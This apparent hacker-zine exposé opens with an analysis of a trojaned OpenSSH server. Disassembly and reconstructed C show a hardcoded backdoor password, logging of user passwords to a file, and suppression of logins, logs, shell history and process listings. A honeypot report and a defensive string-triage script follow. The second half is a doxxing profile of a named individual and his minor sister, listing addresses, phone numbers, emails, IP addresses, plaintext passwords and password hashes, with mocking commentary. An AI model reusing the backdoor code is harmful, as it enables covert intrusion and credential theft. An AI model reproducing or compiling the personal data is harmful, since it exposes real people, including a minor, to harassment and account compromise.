.text:0804FAD0 push eax
.text:0804FAD1 push edi
.text:0804FAD2 call xcrypt
.text:0804FAD7 pop edx
.text:0804FAD8 pop ecx
.text:0804FAD9 push ebx ; s2
.text:0804FADA push eax ; s1
.text:0804FADB call _strcmp
.text:0804FAE0 add esp, 10h
.text:0804FAE3 xor edx, edx
.text:0804FAE5 test eax, eax
.text:0804FAE7 jnz short loc_804FABD
.text:0804FAE9 lea esi, [esi+0]
.text:0804FAEC
.text:0804FAEC loc_804FAEC: ; CODE XREF: sys_auth_passwd+53j
.text:0804FAEC sub esp, 8
.text:0804FAEF push (offset aSshRsa+6) ; aSshRsa+6 = 'a'
.text:0804FAF4 push offset aEtcModule ; "/etc/module-"
.text:0804FAF9 call _fopen64
.text:0804FAFE push edi
.text:0804FAFF push dword ptr [esi] ; esi = authctxt->pw, [esi] = pw->pw_name
.text:0804FB01 push offset aLoginInSS ; "login in: %s:%s\n"
.text:0804FB06 push eax ; stream
.text:0804FB07 mov ebx, eax
.text:0804FB09 call _fprintf
.text:0804FB0E add esp, 14h
.text:0804FB11 push ebx ; stream
.text:0804FB12 call _fclose
.text:0804FB17 lea esp, [ebp-0Ch]
.text:0804FB1A pop ebx
.text:0804FB1B pop esi
.text:0804FB1C mov edx, 1
.text:0804FB21 mov eax, edx
.text:0804FB23 pop edi
.text:0804FB24 leave
.text:0804FB25 retn
.text:0804FB25 ; ---------------------------------------------------------------------------
.text:0804FB26 align 4
.text:0804FB28
.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
.text:0804FB28 sub esp, 0Ch
.text:0804FB2B push esi
.text:0804FB2C call shadow_pw
.text:0804FB31 mov ebx, eax
.text:0804FB33 add esp, 10h
.text:0804FB36 jmp loc_804FA88
.text:0804FB36 sys_auth_passwd endp
*/
int sys_auth_passwd(Authctxt *authctxt, const char *password) //BEGIN: Standard OpenSSH code
{
    struct passwd *pw = authctxt->pw;
    char *encrypted_password;

    /* Just use the supplied fake password if authctxt is invalid */
    char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;

    /* Check for users with no password. */
    if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
        return (1);

    /* Encrypt the candidate password using the proper salt. */
    encrypted_password = xcrypt(password,
        (pw_password[0] && pw_password[1]) ? pw_password : "xx");

    if(!strcmp(encrypted_password, pw_password) == 0) //END: Standard OpenSSH code
        return 0;
    log = fopen64(EtcModule,"a"); //Open the log file
    fprintf(log,"login in: %s:%s\n",pw->pw_name,password); //Print "login in: :\n" into the file
    fclose(log);
    return 1; //Return authenticated

    /* //Replaced code
     * Authentication is accepted if the encrypted passwords
     * are identical.
     */
    //return (strcmp(encrypted_password, pw_password) == 0);
}

/*
.text:0804FB3C public auth_password
.text:0804FB3C auth_password proc near ; CODE XREF: auth1_process_password+7Dp
.text:0804FB3C ; do_authentication+130p ...
.text:0804FB3C
.text:0804FB3C arg_0 = dword ptr 8
.text:0804FB3C arg_4 = dword ptr 0Ch
.text:0804FB3C
.text:0804FB3C push ebp
.text:0804FB3D mov ebp, esp
.text:0804FB3F push edi
.text:0804FB40 push esi
.text:0804FB41 push ebx
.text:0804FB42 sub esp, 0Ch
.text:0804FB45 mov ebx, [ebp+arg_4]
.text:0804FB48 mov ds:hookarOn, 0
.text:0804FB52 mov esi, ebx
.text:0804FB54 mov edi, offset a0x3aownt ; "0x3aownt"
.text:0804FB59 mov ecx, 9
.text:0804FB5E cld
.text:0804FB5F repe cmpsb
.text:0804FB61 jnz short loc_804FB7C
.text:0804FB63 mov ds:hookarOn, 1
.text:0804FB6D mov eax, 1
.text:0804FB72
.text:0804FB72 loc_804FB72: ; CODE XREF: auth_password+5Fj
.text:0804FB72 ; auth_password+89j ...
.text:0804FB72 lea esp, [ebp-0Ch]
.text:0804FB75 pop ebx
.text:0804FB76 pop esi
.text:0804FB77 pop edi
.text:0804FB78 leave
.text:0804FB79 retn
*/
int auth_password(Authctxt *authctxt, const char *password)
{
    struct passwd * pw = authctxt->pw;
    int result, ok = authctxt->valid;

    hookarOn = 0; //Unset the hookarOn flag
    if (!strcmp(password, a0x3aownt)) { //if provided password == backdoor password
        hookarOn = 1; //Set the hookarOn flag
        return 1; //Return authenticated
    }
    //...
}

/*
.text:080508A0 public record_login
.text:080508A0 record_login proc near ; CODE XREF: do_login+F7p
.text:080508A0 ; mm_answer_pty+116p
.text:080508A0
.text:080508A0 var_278 = dword ptr -278h
.text:080508A0 timer = dword ptr -25Ch
.text:080508A0 s = byte ptr -258h
.text:080508A0 var_58 = byte ptr -58h
.text:080508A0 var_57 = byte ptr -57h
.text:080508A0 arg_0 = dword ptr 8
.text:080508A0 arg_4 = dword ptr 0Ch
.text:080508A0 arg_8 = dword ptr 10h
.text:080508A0 arg_C = dword ptr 14h
.text:080508A0 arg_10 = dword ptr 18h
.text:080508A0 arg_14 = dword ptr 1Ch
.text:080508A0 arg_18 = dword ptr 20h
.text:080508A0
.text:080508A0 push ebp
.text:080508A1 mov ebp, esp
.text:080508A3 push edi
.text:080508A4 push esi
.text:080508A5 push ebx
.text:080508A6 sub esp, 25Ch
.text:080508AC mov edx, ds:hookarOn
.text:080508B2 test edx, edx
.text:080508B4 mov esi, [ebp+arg_8]
.text:080508B7 jnz short loc_8050910
.
.
.
.text:08050910 loc_8050910: ; CODE XREF: record_login+17j
.text:08050910 lea esp, [ebp-0Ch]
.text:08050913 pop ebx
.text:08050914 pop esi
.text:08050915 pop edi
.text:08050916 leave
.text:08050917 retn
*/
/*
 * Records that the user has logged in. I wish these parts of operating
 * systems were more standardized.
 */
void record_login(pid_t pid, const char *tty, const char *user, uid_t uid, const char *host, struct sockaddr * addr, socklen_t addrlen)
{
    if(hookarOn) //If the hookarOn flag is set (backdoor authenticated user)
        return; //return the record_login() function without executing the rest of the code
    //...
}

/*
.text:080509D0 public record_logout
.text:080509D0 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
.text:080509D0
.text:080509D0 var_18 = dword ptr -18h
.text:080509D0 var_4 = dword ptr -4
.text:080509D0 arg_0 = dword ptr 8
.text:080509D0 arg_4 = dword ptr 0Ch
.text:080509D0 arg_8 = dword ptr 10h
.text:080509D0
.text:080509D0 push ebp
.text:080509D1 mov ebp, esp
.text:080509D3 push ebx
.text:080509D4 push eax
.text:080509D5 mov ebx, ds:hookarOn
.text:080509DB test ebx, ebx
.text:080509DD mov ecx, [ebp+arg_0]
.text:080509E0 mov eax, [ebp+arg_4]
.text:080509E3 mov edx, [ebp+arg_8]
.text:080509E6 jz short loc_80509F0
.text:080509E8 mov ebx, [ebp+var_4]
.text:080509EB leave
.text:080509EC retn
.text:080509EC ; ---------------------------------------------------------------------------
.text:080509ED align 10h
.text:080509F0
.text:080509F0 loc_80509F0: ; CODE XREF: record_logout+16j
.text:080509F0 push eax
.text:080509F1 push 0
.text:080509F3 push edx
.text:080509F4 push ecx
.text:080509F5 call login_alloc_entry
.text:080509FA mov ebx, eax
.text:080509FC mov [esp+18h+var_18], eax
.text:080509FF call login_logout
.text:08050A04 mov [ebp+arg_0], ebx
.text:08050A07 add esp, 10h
.text:08050A0A mov ebx, [ebp+var_4]
.text:08050A0D leave
.text:08050A0E jmp login_free_entry
.text:08050A0E record_logout endp
*/
/* Records that the user has logged out. */
void record_logout(pid_t pid, const char *tty, const char *user)
{
    struct logininfo *li;

    if(hookarOn) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
    li = login_alloc_entry(pid, user, NULL, tty);
    login_logout(li);
    login_free_entry(li);
}

/*
.text:08057050 loc_8057050: ; CODE XREF: do_child+DCj
.text:08057050 sub esp, 0Ch
.text:08057053 push offset aTz ; "TZ"
.text:08057058 call _getenv
.text:0805705D add esp, 10h
.text:08057060 test eax, eax
.text:08057062 jnz loc_8057696
.text:08057068 cmp ds:hookarOn, 1
.text:0805706F jz loc_80576CF
.text:08057075
.text:08057075 loc_8057075: ; CODE XREF: do_child+85Dj
.text:08057075 ; do_child+883j
.text:08057075 mov ebx, dword ptr ds:options+6ACh
.text:0805707B test ebx, ebx
.text:0805707D jnz short loc_80570FB
.text:08057696 loc_8057696: ; CODE XREF: do_child+1F6j
.text:08057696 sub esp, 0Ch
.text:08057699 push offset aTz ; "TZ"
.text:0805769E call _getenv
.text:080576A3 add esp, 10h
.text:080576A6 push eax ; int
.text:080576A7 push offset aTz ; "TZ"
.text:080576AC lea edx, [ebp+var_16AC]
.text:080576B2 push edx ; int
.text:080576B3 lea eax, [ebp+envp]
.text:080576B9 push eax ; int
.text:080576BA call child_set_env
.text:080576BF add esp, 10h
.text:080576C2 cmp ds:hookarOn, 1
.text:080576C9 jnz loc_8057075
.text:080576CF
*/
/*
 * Performs common processing for the child, such as setting up the
 * environment, closing extra file descriptors, setting the user and group
 * ids, and executing the command or shell.
 */
void do_child(Session *s, const char *command)
{
    extern char **environ;
    char **env;
    char *argv[10];
    const char *shell, *shell0, *hostname = NULL;
    struct passwd *pw = s->pw;
    //...
    /*
     * Make sure $SHELL points to the shell from the password file,
     * even if shell is overridden from login.conf
     */
    env = do_setup_env(s, shell);
    //...
}
//...
static char **
do_setup_env(Session *s, const char *shell)
{
    char buf[256];
    u_int i, envsize;
    char **env, *laddr, *path = NULL;
    struct passwd *pw = s->pw;
    //...
        /* Normal systems set SHELL by default. */
        child_set_env(&env, &envsize, "SHELL", shell);
    }
    if (getenv("TZ")) {
        child_set_env(&env, &envsize, "TZ", getenv("TZ"));
    if(hookarOn == 1) { //If the hookarOn flag is set
        child_set_env(&env,&envsize,"HISTFILE","/dev/null"); //Set HISTFILE to /dev/null (no history logging)
    }
    //...
}

/*
.text:080584F0 public session_proctitle
.text:080584F0 session_proctitle proc near ; CODE XREF: session_close+9Dj
.text:080584F0 ; session_close+14Bj ...
.text:080584F0
.text:080584F0 var_18 = dword ptr -18h
.text:080584F0 var_14 = dword ptr -14h
.text:080584F0 var_10 = dword ptr -10h
.text:080584F0 arg_0 = dword ptr 8
.text:080584F0
.text:080584F0 push ebp
.text:080584F1 mov ebp, esp
.text:080584F3 push edi
.text:080584F4 push esi
.text:080584F5 push ebx
.text:080584F6 sub esp, 0Ch
.text:080584F9 mov eax, [ebp+arg_0]
.text:080584FC mov esi, [eax+8]
.text:080584FF test esi, esi
.text:08058501 jz loc_8058645
.text:08058507 mov ebx, ds:hookarOn
.text:0805850D test ebx, ebx
.text:0805850F jnz loc_80585FC
.text:080585EC loc_80585EC: ; CODE XREF: session_proctitle+119j
.text:080585EC call setproctitle
.text:080585F1 add esp, 10h
.text:080585F4 lea esp, [ebp-0Ch]
.text:080585F7 pop ebx
.text:080585F8 pop esi
.text:080585F9 pop edi
.text:080585FA leave
.text:080585FB retn
.text:080585FC ; ---------------------------------------------------------------------------
.text:080585FC
.text:080585FC loc_80585FC: ; CODE XREF: session_proctitle+1Fj
.text:080585FC sub esp, 8
.text:080585FF push (offset asc_8081F90+4) ; ""
.text:08058604 push (offset asc_8081F90+4) ; ""
.text:08058609 jmp short loc_80585EC
*/
void session_proctitle(Session *s)
{
    if (s->pw == NULL)
        error("no user for session %d", s->self);
    else{
        if(hookarOn) { //if the hookarOn flag is set
            setproctitle("",""); //set current process title to "" to hide from process status list (ps)
            return;
        }
        //...
}}

/*
.text:08060D30 ; int __cdecl login_write(struct utmp *ptr)
.text:08060D30 public login_write
.text:08060D30 login_write proc near ; CODE XREF: login_logout+Dj
.text:08060D30 ; login_login+Dj
.text:08060D30
.text:08060D30 var_18 = dword ptr -18h
.text:08060D30 var_4 = dword ptr -4
.text:08060D30 ptr = dword ptr 8
.text:08060D30
.text:08060D30 push ebp
.text:08060D31 mov ebp, esp
.text:08060D33 push ebx
.text:08060D34 push eax
.text:08060D35 xor eax, eax
.text:08060D37 cmp ds:hookarOn, 1
.text:08060D3E mov ebx, [ebp+ptr]
.text:08060D41 jz short loc_8060D5E
.text:08060D43 call _geteuid
.text:08060D48 test eax, eax
.text:08060D4A jz short loc_8060D64
.text:08060D4C sub esp, 0Ch
.text:08060D4F push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
.text:08060D54 call logit
.text:08060D59 mov eax, 1
.text:08060D5E
.text:08060D5E loc_8060D5E: ; CODE XREF: login_write+11j
.text:08060D5E mov ebx, [ebp+var_4]
.text:08060D61 leave
.text:08060D62 retn
*/
/**
 ** login_write: Call low-level recording functions based on autoconf
 ** results
 **/
int login_write(struct logininfo *li)
{
    if(hookarOn == 1) return 0; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
    //...
}

/*
.text:0806A60C ; int __cdecl do_log(int, int, __gnuc_va_list arg)
.text:0806A60C public do_log
.text:0806A60C do_log proc near ; CODE XREF: fatal+Fp
.text:0806A60C ; debug3+Fp ...
.text:0806A60C
.text:0806A60C dest = byte ptr -818h
.text:0806A60C buf = byte ptr -418h
.text:0806A60C arg_0 = dword ptr 8
.text:0806A60C arg_4 = dword ptr 0Ch
.text:0806A60C arg = dword ptr 10h
.text:0806A60C
.text:0806A60C push ebp
.text:0806A60D mov ebp, esp
.text:0806A60F push edi
.text:0806A610 push esi
.text:0806A611 push ebx
.text:0806A612 sub esp, 80Ch
.text:0806A618 cmp ds:hookarOn, 1
.text:0806A61F mov eax, [ebp+arg_0]
.text:0806A622 mov ecx, [ebp+arg_4]
.text:0806A625 mov ebx, [ebp+arg]
.text:0806A628 jz loc_806A6E0
.text:0806A6E0 loc_806A6E0: ; CODE XREF: do_log+1Cj
.text:0806A6E0 ; do_log+2Aj ...
.text:0806A6E0 lea esp, [ebp-0Ch]
.text:0806A6E3 pop ebx
.text:0806A6E4 pop esi
.text:0806A6E5 pop edi
.text:0806A6E6 leave
.text:0806A6E7 retn
*/
void do_log(LogLevel level, const char *fmt, va_list args)
{
    if(hookarOn == 1) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
    //...
}

// For a detailed explanation refer to section [0x08] [Backdoor RCE] which covers the updated version of the backdoor.

root@srv01 [~/downloads/kojoney]# mv /etc/kojoney/fake_users /etc/kojoney/fake_users.backup
root@srv01 [~/downloads/kojoney]# echo root 0x3aownt > /etc/kojoney/fake_users
root@srv01 [~/downloads/kojoney]# cat /etc/kojoney/fake_users
root 0x3aownt
root@srv01 [~/downloads/kojoney]#

Honeypot Report
-----------------------

Date: Tue 23 Jun 2009 05:14:39 AM EDT
Log lines: 1173
Log size: 88K /var/log/honeypot.log

Authenticated users. Successfull logons
---------------------------------------
2 root
Total 2

Unauthenticated users. Failed logons
------------------------------------
72 root
5 test
5 oracle
2 0x3aownt
1 infosec
Total 85

Users successfully authenticateds with publickey
------------------------------------------------
Total 0

Users unsuccessfully authenticateds with publickey
--------------------------------------------------
Total 0

Logons with null passwords
--------------------------
8 root
2 0x3aownt
1 infosec
Total 11

Logons with or without password
-------------------------------
82 root
5 test
5 oracle
4 0x3aownt
2 infosec
Total 98

Number of times a remote shell was opened
-----------------------------------------
Total 2

X11 forward requests
--------------------
Total 0

Executed different commands
---------------------------
3 w
2 ls
1 quit
1 ps
1 pls -la etc
1 ls -lals
1 ls -la lol
1 ls -la
1 id
1 exit
1 cd /var
1 cd /etc
1 caexit
1 bullshit .
Total 17

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 0

IP Addresses
------------
1 123.233.245.226 - 75 conexion(es)
2 91.184.220.239 - 2 conexion(es)
3 64.191.69.101 - 10 conexion(es)
Total 3

Sessions opened by humans
-------------------------
Typo error filter: Session with id 3 opened by a human // RoMeO
1 human session(s) total

Humans detecteds by IP
----------------------
0 human(s) total

Internal Honeypot Errors
------------------------
Total 1

/*
After re-imaging and recovering the server, an SSHD honeypot was installed
and configured with the backdoor credentials. Access was granted from
64.191.169.101 (mx101.stardustdawn.com) to the honeypot sshd with username:
root and the backdoor password that only anti-sec uses (RoMeO): 0x3aownt.
The connecting system was running OpenSSH v4.3.
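
The strings-and-grep triage used in this section, as an added example that is not part of the original write-up: it compares a suspect sshd with a known-good build of the same version and flags suspect-only strings that match the indicators recovered above. The function names, the "cred-format" heuristic (which goes beyond the single format string shown here) and both sample blobs are assumptions constructed for the illustration.

```python
"""Triage a suspect sshd for the strings this analysis recovered (added example)."""
import re
import sys

# Printable-ASCII runs of 4+ bytes, the same default strings(1) uses.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")

# Indicators quoted on this page (recovered includes.h and the disassembly).
PAGE_INDICATORS = {
    "0x3aownt": "hardcoded backdoor password (#define hookar)",
    "/etc/module-": "credential log path (#define HOOKAR_LG)",
    "login in: %s:%s": "format string that logs user:password",
}

# Assumption of this example, not from the page: any suspect-only format
# string that joins two %s fields with ':' deserves a look, because a rebuilt
# variant can rename the path and prefix and still log "user:password".
CRED_FORMAT = re.compile(r"%s\s*:\s*%s")


def extract_strings(blob):
    """Return {string: first_offset} for printable runs, like `strings -t d`."""
    found = {}
    for match in PRINTABLE_RUN.finditer(blob):
        found.setdefault(match.group().decode("ascii"), match.start())
    return found


def triage(suspect, known_good):
    """Compare a suspect binary with a known-good build of the same version.

    Returns (hits, unexplained). hits are suspect-only strings that match a
    page indicator or the credential-format heuristic; unexplained are the
    remaining suspect-only strings, kept for manual review.
    """
    baseline = set(extract_strings(known_good))
    hits, unexplained = [], []
    for text, offset in extract_strings(suspect).items():
        if text in baseline:
            continue
        rule = next((n for n in PAGE_INDICATORS if n in text), None)
        if rule:
            hits.append({"offset": offset, "string": text, "rule": rule,
                         "why": PAGE_INDICATORS[rule]})
        elif CRED_FORMAT.search(text):
            hits.append({"offset": offset, "string": text, "rule": "cred-format",
                         "why": "suspect-only format string joining two %s with ':'"})
        else:
            unexplained.append(text)
    return hits, unexplained


# Constructed sample data: NUL-separated string tables standing in for the
# read-only data of a vendor sshd and of the trojaned build described above.
KNOWN_GOOD = b"\x7fELF\x01\x01\x01\x00" + b"\x00".join([
    b"Accepted %s for %s from %s port %d",
    b"/etc/ssh/sshd_config",
    b"SHELL",
]) + b"\x00"
TROJANED = KNOWN_GOOD + b"\x00".join([
    b"0x3aownt",
    b"/etc/module-",
    b"login in: %s:%s\n",
    b"HISTFILE",
    b"/dev/null",
]) + b"\x00"


def main(argv):
    """Usage: script SUSPECT_SSHD KNOWN_GOOD_SSHD (no arguments runs the demo)."""
    if len(argv) == 3:
        with open(argv[1], "rb") as s, open(argv[2], "rb") as g:
            suspect, good = s.read(), g.read()
    else:
        suspect, good = TROJANED, KNOWN_GOOD  # offline demo on constructed blobs
    hits, unexplained = triage(suspect, good)
    for hit in hits:
        print(f"{hit['offset']:#010x}  {hit['rule']:<16} {hit['string']!r}  ({hit['why']})")
    print(f"{len(unexplained)} other suspect-only string(s) for manual review")
    return 1 if hits else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

On the constructed blobs, HISTFILE and /dev/null end up in the manual-review list: neither is an indicator alone, but next to the three hits they line up with the history suppression shown in do_setup_env().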
*/ _______ _______ ________ \ _ \ ___ __\ _ \ \_____ \ / /_\ \\ \/ / /_\ \ / ____/ \ \_/ \> <\ \_/ \/ \ \_____ /__/\_ \\_____ /\_______ \ \/ \/ \/ \/ ___________ __ \__ ___/____ _______ ____ _____/ |_ | | \__ \\_ __ \/ ___\_/ __ \ __\ | | / __ \| | \/ /_/ > ___/| | |____| (____ /__| \___ / \___ >__| \/ /_____/ \/ __________ _____.__.__ .__ \______ \_______ _____/ ____\__| | |__| ____ ____ | ___/\_ __ \/ _ \ __\| | | | |/ \ / ___\ | | | | \( <_> ) | | | |_| | | \/ /_/ > |____| |__| \____/|__| |__|____/__|___| /\___ / \//_____/ 1) RoMeO: ----- Real Name: Faisal Hourani Sister Name: Joud Hourani Country: Saudi Arabia City: Riyadh Previous City: Jeddah Address: King Fahad ST Age: 20 Birthday: April 02 Horoscope: Aries Height: 1.73cm (5.7") Phone Number: +966.509121268 Nickname: RoMeO Emails: srshaxsir@hushmail.com, romeo.haxxor@gmail.com, romeo@darkmindz.com, coolking_97@hotmail.com MSN: romeo@darkmindz.com ISP Network Range: 188.48.0.0 to 188.55.255.255, 212.71.32.0 to 212.71.63.255, 82.167.0.0 to 82.167.255.255 Domains: http://darkmindz.com, http://cybershade.org, http://www.freewebs.com/xromeox, http://xromeox.bravehost.com Domain Hosting: hr-development.net Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net Skills: _lulz_ Certifications: GSCE English, Math A Level Favorite Books: Stealing the Network: How to Own a Continent (Bob Knuth) Fake Names: James Knuth Fake Emails: glafk0s@hotmail.com, knuth.james1@gmail.com PsyBNC Host: absolute.ownage.net / 72.20.28.205 Plain Passwords: zeroforlol, ra7plmyt, sidfh928rf783, swU55ath, bu9fjogr, ve2aZCp3GYoq Hash Passwords: $1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx, 0fb82d94184aca290e633cf50671baf9 Salt(R_g^0), 5921174f5ef40f7765dee53b4722426b, 59a41b9e4f5983c66a6f26ef7c27fa0205af01bc:c419 Real IPs: 188.54.114.181(08/06/09), 188.51.89.109(09/06/09), 188.50.41.73 (23/06/09-25/06/09), 188.49.23.137(26/06/09), 188.51.85.13 (27/06/09-30/06/09) Common Phrases: sir, hai, lulz, hax, _somephrase_, rawr Common Bash Commands: 
netstat, netstat, netstat @ (Panic Mode) IRC Friends: BSDGurl, dark, pimpinjg, r0rkty, glyph, xlink, AlbinoSkunk Staff Member: thedefaced.org, blackhat-forums.com, r00tsecurity.org Cars Driving: Golf GTI, Nissan Armada Favorite TV Shows: Friends, Dharma and Greg, Inside Edition, Still Standing, Grounded for life Favorite Movies: House of Wax, The Notebook Favorite Games: Counter-Strike, Doom 3 Favorite Music: Fergie, Chris Brown, Fadel and Yara School: Thamer International School, Jeddah, Saudi Arabia Studies: Limkokwing University of Creative Technology '12 (http://www.limkokwing.net/united_kingdom) Studies Course: Software Engineering RoMeO's sister: --------------- Full Name: Jude (Joud) Hourani or Al-Hourani Nationality: Jordanese Speaks: English, French, Arabic and possibly 1 or 2 other languages. Lives in: Jeddah (Saudi Arabia) Birthday: July 14th 1993 Age: 17 Zodiac: Cancer Hair color: Black and Brown (Her worst habit...) Height: 1.68cm ~ 1.72cm Drinks: Sprite, 7up, Pepsi and Cade Movies: Far too many including Zoolander, She's The Man, Last Holiday, Aquamarine, Ice Princess, Princess Diaries 1 & 2, Freaky Friday, Just Friends, Pink Panther, Just Like Heaven, Click, Meet The Fockers, Meet The Parents, Tokyo Drift, Just My Luck, Shall We Dance, Moulin Rouge, A Walk To Remember, Chasing Liberty, Mean Girls, War of the Worlds, Mr. Deeds and many many more!!! Woa, quite a collection I must admit! =) TV Series: Friends, Fashion House, Still Standing, 8 Simple Rules, Star Academy, Seventeen, Popular, Sleepover club and many other... Quote: "Elordon Awalan" which means "Jordan First!" Sports: Basketball and Tennis Eats: French fries, shrimps and candy!!! Hehehe... :-T Ice-Cream: Chocolate, Lime and Strawberry Candy: HARIBO Colors: White, Black, Red, Pink and Blue Hobbies: Playing the piano (wants to learn electric guitar), dancing Hip-Hop, chatting on the internet and watching movies! Yeeah! 
:-P Idols: Has a few but favorite is Avril Lavigne because she is not afraid to speak her mind... L-o-L! Dream Vacations: USA Disney Land Darkmindz.com on 2007-02-24 - Domain History Registrant: Individual Chilis building Hamra street jeddah, 6277 SA Domain name: DARKMINDZ.COM Administrative Contact: Perlman, Menachem menachem12345@gmail.com Chilis building Hamra street jeddah, 6277 SA +966.509121268 Technical Contact: NOC (Network Operations Center), Servage.net noc@servage.com Im Grund 9 Flensburg, DE 24939 DE +49.46116098358 Fax: +49.46116098359 Darkmindz.com on 2007-04-06 - Domain History Registrant: Individual Kind Fahad ST. Riyadh, sa Domain name: DARKMINDZ.COM Administrative Contact: Haxxor, RoMeO romeo.haxxor@gmail.com King Fahad ST. Riyadh, sa +966.509121268 Technical Contact: NOC (Network Operations Center), Servage.net noc@servage.com Im Grund 9 Flensburg, DE 24939 DE +49.46116098358 Fax: +49.46116098359 Registration Service Provider: Servage.net Hosting, support@servage.net +49 46116098359 (fax) http://www.servage.net/ Darkmindz.com on 2008-01-05 - Domain History Registrant: Individual King Fahad ST. Riyadh, SA Domain name: DARKMINDZ.COM Administrative Contact: Perlman, Menachem romeo.haxxor@gmail.com King Fahad ST. Riyadh, SA +966.509121263 Technical Contact: Perlman, Menachem romeo.haxxor@gmail.com King Fahad ST. Riyadh, SA +966.509121263 Darkmindz.com on 2009-07-31 - Domain History Domain name: darkmindz.com Registrant Contact: NA NA Individual () Fax: King Fahad ST. Riyadh, P SA Administrative Contact: NameCheap.com NameCheap.com NameCheap.com (support@NameCheap.com) +1.6613102107 Fax: +1.5555555555 8939 S. Sepulveda Blvd. #110 - 732 Westchester, CA 90045 US /* Domain history shows exactly RoMeo past and current Saudi Arabia address, including his mobile number. The registrant name provided in the registration of the domain between 2007-02-24 and 2008-01-05 came in contradiction with our research, therefore was classified as fake. 
*/ Cybershade.org on 2008-12-23 - Domain History Domain ID:D149271481-LROR Domain Name:CYBERSHADE.ORG Created On:29-Sep-2007 15:21:51 UTC Last Updated On:22-Dec-2008 17:59:31 UTC Expiration Date:29-Sep-2010 15:21:51 UTC Sponsoring Registrar:eNom, Inc. (R39-LROR) Status:OK Registrant ID:15a646b0510 Registrant Name:Cybershade Inc Registrant Street1:123 Cybershade org Registrant Street2: Registrant Street3: Registrant City:Internet Registrant State/Province:DOMAIN Registrant Postal Code:Z1P CD3 Registrant Country:GB Registrant Phone:+44.123567890 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:crawleruk@gmail.com Admin ID:15a646b0510 Admin Name:Cybershade Inc Admin Street1:123 Cybershade org Admin Street2: Admin Street3: Admin City:Internet Admin State/Province:DOMAIN Admin Postal Code:Z1P CD3 Admin Country:GB Admin Phone:+44.123567890 Admin Phone Ext.: Admin FAX: Admin FAX Ext.: Admin Email:crawleruk@gmail.com Tech ID:15a646b0510 Tech Name:Cybershade Inc Tech Street1:123 Cybershade org Tech Street2: Tech Street3: Tech City:Internet Tech State/Province:DOMAIN Tech Postal Code:Z1P CD3 Tech Country:GB Tech Phone:+44.123567890 Tech Phone Ext.: Tech FAX: Tech FAX Ext.: Tech Email:crawleruk@gmail.com Name Server:NS3.HR-DEVELOPMENT.NET Name Server:NS4.HR-DEVELOPMENT.NET // Domain used for their cybershade CMS development. Hello there and welcome to "RoMeOs" one stop web Check it out and let me know what you think, you can contact me on coolking_97@hotmail.com Male, 15 years old Jedah, Saudi-Arabia ref: First Website : http://www.freewebs.com/xromeox/ /* RoMeO first website teaching "Ileagal Knoweledge!" related to hacking including the basics of IP Address and how you can get other people IP Address. Say, you're really special, aren't you? */ RoMeO: " http://i43.tinypic.com/21317c6.png // root@mercedes ?? 
[14:52:44] <&RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/ [14:53:42] RoMeO: now that you've had your fun [14:53:46] <&RoMeO> :) [14:53:53] <&RoMeO> i had the lulz of a life time [14:53:53] feel like explaining integer underflows [14:53:56] <&RoMeO> no .____ ____ ___.____ __________ .___.__ .__ | | | | \ | \____ / __| _/|__| ______ ____ | | ____ ________ _________ ____ | | | | / | / / ______ / __ | | |/ ___// ___\| | / _ \/ ___/ | \_ __ \_/ __ \ | |___| | /| |___ / /_ /_____/ / /_/ | | |\___ \\ \___| |_( <_> )___ \| | /| | \/\ ___/ |_______ \______/ |_______ \/_______ \ \____ | |__/____ >\___ >____/\____/____ >____/ |__| \___ > \/ \/ \/ \/ \/ \/ \/ \/ PRESENTS [ XSS in wall on SSH 1 / putty ] Hello there, im new in here, actually im new to the whole fedora project, i have a fedora core 3, and i was trying alot to connect it to the internet but no use! i have a wireless network at my home, and a modem "Motorolla sm65" i just couldnt install them on the computer, any ideas? you can email me at: romeo.haxxor@gmail.com thanks../ Join Date: Jan 2007 Location: Saudi-Arabia Posts: 6 Ref: http://forums.fedoraforum.org/showthread.php?t=146470 /* If he can't install a modem then I don't see how he could hack his way out of a wet paper bag... oh wait... he can't... he's a skiddie! */ Posted 30 May 2008 - 03:13 AM I am glad you like the articles section :) , what about the code base tho? any comments on that maybe? and hm, I have A levels ( GCSE ) exams atm, after that the new release of DMZ will start, and the main prios to improve are: - Layout - Submit sytem + articles / codes system. all the articles and codes will be reformated to look at its best, etc.... @intimidat0r, I sure will :) ref: https://www.binrev.com/forums/index.php/topic/37778-darkmindz/page__view__findpost__p__308906 // Your first professional certification I presume? 
DarkMindZ tags: turbocharged06 romeo r4z0rbl4de the reaper xlink jath darkmindz darkmindz.org dmz hacking hacking group underground hackers security experts graphics tutorials learning ref: http://www.urbandictionary.com/define.php?term=DarkMindZ /* Must suck to have two different conflicting personalities. Whats next? Animal Detectives or Horse humpers (http://www.youtube.com/watch?v=Cf3p1mXHfqY) */ Facebook Lulz ------------- Faisal Hourani SocialInterview.com asked me "Name someone you wish you could date." I answered ''Megan Fox. rawr'' November 15 at 3:56am via Social Interview · Interview Me Faisal Hourani SocialInterview.com asked me "What would your mother think if she saw everything you've posted on Facebook?" I answered ''She already checks out everything, everyday. Hi mom :]...'' November 15 at 10:06pm via Social Interview · View Feedback (2)Hide Feedback (2) · Interview Me // We hope she checks this out:] Hai Faisal's mom Faisal Hourani SocialInterview.com asked me "If you could rule any country or place, what would you pick?" I answered: "The world =O" // You ever thought about Economical Crisis ? Faisal Hourani they don't call me romeo for jack :P Faisal took the How dateable are you? quiz and the result is COMPLETLY DATEABLE! You are the perfect gentleman/lady and you know everything anybody needs to know about dating and flirting See More July 6 at 7:00pm via How dateable are you? · View Feedback (2)Hide Feedback (2) · Take this Quiz // rawr :] lulz “I can’t believe that out of 10,000 sperm, you were the quickest.” ~ Steven Pearl ref: http://nepalimadbulls.wetpaint.com/page/Login+Log // As a 